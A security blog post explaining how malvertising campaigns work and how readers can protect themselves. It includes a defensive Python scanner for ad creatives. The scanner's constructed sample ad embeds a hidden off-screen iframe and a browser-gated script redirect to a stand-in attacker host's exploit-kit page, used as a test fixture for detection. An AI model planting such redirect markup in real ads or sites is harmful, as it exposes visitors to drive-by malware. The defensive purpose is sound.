Have you ever heard the song Flagpole Sitta by Harvey Danger from back in the ’90s? It had this brilliant line in it: “Paranoia, paranoia, everybody’s coming to get me”. We like to think that people who assume the whole world is out to get them are, well, just a tad… paranoid. But in the digital realm it sure does seem like Harvey Danger was tapping into something very true.
Malvertising is one of those cases in which, yup, they really are out to get you. Well, not you specifically, but everybody, everywhere. Malvertising, a favorite tactic of hackers and scammers, is a simple yet highly orchestrated attack method that turns legitimate, innocent websites into dealers of all sorts of malware: zero-day exploits, ransomware, banking trojans and more. There are four basic players in any malvertising situation, and in order for the cyber criminal to pull off the attack, things have to run in a pretty choreographed manner.
The four players in any malvertising campaign
The bad guy – The most important part of any malvertising campaign is the bad guy. He creates ads that look real but carry a malicious payload, typically a script that quietly sends the viewer somewhere else. He then submits that “ad” to a middle-man, the ad exchange or ad network, posing as a credible business and paying to have it placed like any other advertiser.
The ad exchange or ad network – Whenever there are ads on websites, they have been placed there by ad exchanges or networks that advertisers pay to display ads on ad-supported sites. The bad guy submits a seemingly innocent but really malware-laden “ad” to the network or exchange, and the exchange, not knowing that the ad is poisoned, serves it up to any ol’ website it distributes ads to. According to Digiday.com, “The problem is that billions of ad impressions flow through exchanges every day from millions of publishers, so it’s almost impossible to keep track of who’s selling and buying what. That means buyers can never be exactly sure where their impressions might show up. And sellers can never be entirely sure who’s buying them.” In other words, there is no practical way for these exchanges to make sure that every ad they place is clean.
That said, certain ad exchanges are working on protocols governing whom they accept ads from, and most use anti-malware solutions to root out what they can, which works to a certain degree but doesn’t really settle the issue.
The website – Websites such as Forbes.com, Yahoo.com, The New York Times, Reuters, Jamie Oliver.com and countless other big-name websites have been fed malware-laden ads. In practice, this means that a simple visit to NYT.com could fill a computer with malware in a drive-by attack, and it really has nothing to do with the website itself. They were just a means of transporting the rotten wares, like the high-speed bullet train a conman jumps on to get from London to Paris to pull off his crime. It sure ain’t the train’s fault.
The victim – So let’s say you wanted to catch up on the news. “Hmmm. I think I’ll check out what the HuffPost has to say,” so you meander over to the Huffington Post. While you’re on the site, you barely notice it, but there is an ad for something: a car, a perfume, anything really. That ad then redirects you to a page (often invisible to the surfer) that hosts an exploit kit, which probes your browser and its plugins for vulnerabilities, the holes left by software that hasn’t been patched or updated. If it finds one, it exploits it to drop the malware onto your machine, and BAM! You’ve got malware!
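The redirect hop described above is the step a screening check can catch before the ad ever reaches a visitor. What follows is an added example, not code from the original post and not any ad network’s actual screening tool: a small static scanner in Python that takes an ad creative’s HTML and flags the tells of that hop, namely iframes pointing outside the network’s own domains that are sized 1x1 or styled off-screen, meta refreshes to third-party hosts, and inline scripts that assign `location` to a third-party URL. The sample creative, the network allowlist (`example-network.test`) and the attacker host (`attacker-cdn.test`) are all constructed for the example.

```python
"""Static screen for an ad creative: flag hidden iframes and redirects to hosts
outside the ad network's allowlist, the pattern a malvertising chain uses to
bounce a visitor to an exploit-kit landing page without showing anything.
Added example; example-network.test / attacker-cdn.test are made-up hosts."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Style fragments that make an element invisible or push it off screen.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}px", re.I)
# The "url=..." part of a <meta http-equiv="refresh" content="0;url=..."> tag.
REFRESH_URL = re.compile(r"url\s*=\s*['\"]?([^'\";\s]+)", re.I)
# location = "..."; location.href = "..."; location.replace("...")
JS_REDIRECT = re.compile(
    r"location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]"
    r"|location\.replace\(\s*['\"]([^'\"]+)['\"]", re.I)


def _px(value):
    """Parse a width/height attribute such as "1" or "300px"; None if not pixels."""
    m = re.fullmatch(r"\s*(\d+)(?:px)?\s*", str(value), re.I)
    return int(m.group(1)) if m else None


class CreativeScanner(HTMLParser):
    """Collects (finding_kind, url) pairs while walking the creative's markup."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.findings = []
        self._script_buf = None  # collects inline <script> text until </script>

    def _allowed(self, url):
        host = (urlparse(url).hostname or "").lower()
        if not host:  # relative URL: resolves against the creative's own origin
            return True
        return any(host == a or host.endswith("." + a) for a in self.allowed)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._script_buf = []
            if a.get("src") and not self._allowed(a["src"]):
                self.findings.append(("third-party-script", a["src"]))
        elif tag == "iframe" and a.get("src") and not self._allowed(a["src"]):
            tiny = any(p is not None and p <= 1
                       for p in (_px(a.get("width")), _px(a.get("height"))))
            hidden = tiny or bool(HIDDEN_STYLE.search(a.get("style") or ""))
            kind = "hidden-iframe" if hidden else "third-party-iframe"
            self.findings.append((kind, a["src"]))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = REFRESH_URL.search(a.get("content") or "")
            if m and not self._allowed(m.group(1)):
                self.findings.append(("meta-refresh", m.group(1)))

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            for m in JS_REDIRECT.finditer("".join(self._script_buf)):
                url = m.group(1) or m.group(2)
                if not self._allowed(url):
                    self.findings.append(("script-redirect", url))
            self._script_buf = None


def scan_creative(html, allowed_hosts):
    """Return the list of (kind, url) findings for one creative's HTML."""
    scanner = CreativeScanner(allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a plausible perfume ad with a legitimate 1x1 tracking pixel
# on the network's own CDN, plus an off-screen iframe and a fingerprinting script
# that both point at a host the network has never heard of.
NETWORK_HOSTS = ["example-network.test"]
SAMPLE_CREATIVE = """
<a href="https://ads.example-network.test/click?id=123">
  <img src="https://cdn.example-network.test/perfume.jpg" width="300" height="250">
</a>
<iframe src="https://cdn.example-network.test/pixel" width="1" height="1"></iframe>
<iframe src="http://landing.attacker-cdn.test/gate.php" width="1" height="1"
        style="position:absolute;left:-9999px"></iframe>
<script>
  if (navigator.userAgent.indexOf("Windows") !== -1) {
    location.replace("http://landing.attacker-cdn.test/ek/index.php");
  }
</script>
"""

if __name__ == "__main__":
    for kind, url in scan_creative(SAMPLE_CREATIVE, NETWORK_HOSTS):
        print(f"{kind:20} {url}")
```

The allowlist matters more than the regexes: a 1x1 iframe is a perfectly normal tracking pixel when it points at the network’s own CDN, so the scanner only reports hidden frames and redirects that leave the network’s domains. It is a static check, so a creative that builds its redirect URL at runtime from obfuscated strings will slip past it; that is exactly why networks pair this sort of screening with the behavioral anti-malware tools mentioned above.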
This is a typical malvertising scenario, and it happens all the time. It’s doing huge damage, estimated by cyber security firms to be in the billions. In fact, incidents of malvertising increased by 260 percent from 2014 to 2015 and are on track to surpass those numbers in 2016. And it’s easy to see why it’s a favorite method: for just a few dollars, a criminal can place an ad on a website that gets hundreds of millions of impressions. If only 10 percent of the viewers actually have the vulnerability that particular exploit needs to run, the criminal is still making off like, well, a bandit.
There are some things you can do to protect yourself from malvertising, making sure your next trip to Yahoo or NYT.com (or whatever website happens to be serving up the infected ads this particular time around) is actually safe:
- Update and patch all software and operating systems. The holes left by unpatched and out-of-date software are just about the greatest thing since sliced bread to a hacker. Close them before they get the chance to exploit them.
- Install a reputable anti-malware program like RCS to block the malware that malvertising schemes attempt to serve up.
- Use an ad blocker. This is a bit of a touchy topic, as blocking ads takes money away from legit publishers and advertisers. On the other hand, if there is no ad, there’s no malvertising… we’ll let you ponder this point and decide how you want to proceed.
While malvertising is not new, it’s another growing malware distribution method you need to be aware of. Thankfully you aren’t fully defenseless, and if you take the right measures, you don’t need to be all that paranoid… or maybe that’s not the worst thing in this crazy world. If a bit of paranoia keeps your software patched and keeps you from doing dumb stuff on the internet, well, to that we say: paranoia, paranoia, they really are coming to get you, so keep it up!